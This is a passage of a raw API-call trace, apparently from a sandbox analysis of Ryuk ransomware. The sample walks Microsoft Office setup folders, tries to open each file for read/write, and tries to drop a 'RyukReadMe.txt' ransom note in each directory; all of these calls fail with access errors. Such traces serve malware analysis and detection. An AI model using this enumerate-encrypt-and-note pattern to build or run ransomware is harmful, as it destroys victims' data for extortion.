Controller\\Office.en-us\\PSCONFIG.CHM", dwFileAttributes=0x80) returned 0 [0131.741] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.741] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.741] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.741] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM", dwFileAttributes=0x80) returned 0 [0131.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.742] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.742] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.742] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.742] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM", dwFileAttributes=0x80) returned 0 [0131.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.743] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.743] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.743] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.743] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.743] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM", dwFileAttributes=0x80) returned 0 [0131.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.744] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.744] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.744] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.744] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.744] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.744] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.745] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.745] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.745] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.745] SetLastError (dwErrCode=0x0) [0131.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.748] GetLastError () returned 0x5 [0131.748] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.748] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.748] SetLastError (dwErrCode=0x0) [0131.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.748] GetLastError () returned 0x5 [0131.748] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.748] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.748] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.749] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.749] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.749] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML", dwFileAttributes=0x80) returned 0 [0131.750] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.750] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.750] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.750] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.750] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.750] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.751] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.751] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.751] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.751] SetLastError (dwErrCode=0x0) [0131.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.751] GetLastError () returned 0x5 [0131.751] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.751] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.751] SetLastError (dwErrCode=0x0) [0131.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.751] GetLastError () returned 0x5 [0131.751] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.751] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.751] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.752] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.752] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.752] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.752] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML", dwFileAttributes=0x80) returned 0 [0131.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.753] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.753] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.753] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.753] SetLastError (dwErrCode=0x0) [0131.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.753] GetLastError () returned 0x5 [0131.753] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.753] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.753] SetLastError (dwErrCode=0x0) [0131.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.753] GetLastError () returned 0x5 [0131.753] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.753] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.753] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.754] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.754] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.754] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML", dwFileAttributes=0x80) returned 0 [0131.754] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\OneNoteMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\onenotemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.755] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.755] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.755] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.755] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.755] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.756] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.756] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.756] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.756] SetLastError (dwErrCode=0x0) [0131.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.756] GetLastError () returned 0x5 [0131.756] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.756] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.756] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.756] SetLastError (dwErrCode=0x0) [0131.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.756] GetLastError () returned 0x5 [0131.757] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.757] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.757] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.757] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.757] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.757] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.757] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML", dwFileAttributes=0x80) returned 0 [0131.758] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\OutlookMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.758] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.758] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.758] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.758] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.758] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.759] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.759] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.759] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.759] SetLastError (dwErrCode=0x0) [0131.759] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.759] GetLastError () returned 0x5 [0131.759] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.759] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.759] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.759] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 0 [0131.760] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.760] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.760] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.760] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.760] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.760] SetLastError (dwErrCode=0x0) [0131.761] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.761] GetLastError () returned 0x5 [0131.761] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0131.761] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.761] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3bb540 [0131.761] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.761] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.761] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML", dwFileAttributes=0x80) returned 0 [0131.762] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\PowerPointMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.762] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.762] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.762] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0131.762] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML", dwFileAttributes=0x80) returned 0 [0131.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.763] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.763] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.763] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0131.763] FindClose (in: hFindFile=0x3bb540 | out: hFindFile=0x3bb540) returned 1 [0131.763] SetLastError (dwErrCode=0x0) [0131.763] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PowerPoint.en-us\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\powerpoint.en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 